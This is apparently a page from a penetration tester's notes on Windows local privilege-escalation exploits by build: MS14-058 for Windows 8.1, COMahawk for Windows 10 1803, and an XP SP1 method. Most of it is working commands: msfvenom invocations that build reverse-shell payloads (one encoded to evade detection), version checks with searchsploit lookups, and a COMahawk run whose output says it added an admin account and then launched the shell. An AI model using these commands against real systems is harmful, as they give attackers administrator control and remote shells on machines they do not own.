Build Exploits

Win 8.1 PRO Build 9600 - x64

ms14-058 - # Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058)

https://gist.github.com/AfroThundr3007730/088b2e2ec4ff1eba295e073d1428d85d

SHELLCODE ->

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 -f c

Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation

$ locate windows/local/47684.md
/usr/share/exploitdb/exploits/windows/local/47684.md

# System version number

winver - 1803 OS Build 17134.112

REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ReleaseId    REG_SZ    1803

$ searchsploit 1803

# Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation 
| windows/local/47684.md

$ locate windows/local/47684.md
/usr/share/exploitdb/exploits/windows/local/47684.md

C:\Users\test\Desktop>COMahawk.exe
[\] Progress:  1/9 2/9 3/9 4/9 5/9 6/9 7/9 8/9 9/9
[+] Hopefully Tomahawk:RibSt3ak69 is added as an admin.

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 -f exe -e x86/shikata_ga_nai -i 8 -o rev.exe

COMahawk.exe "\Users\test\Desktop\rev.exe &"

Win XP SP0/SP1

https://sohvaxus.github.io/content/winxp-sp1-privesc.html

accesscheck.exe - Old Version - https://xor.cat/assets/other/Accesschk.zip

PreviousPsExec.exe NextUnquoted Service Paths

Last updated 4 years ago

hashtagWin 8.1 PRO Build 9600 - x64

hashtagMicrosoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation

hashtagWin XP SP0/SP1

Win 8.1 PRO Build 9600 - x64

Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation

Win XP SP0/SP1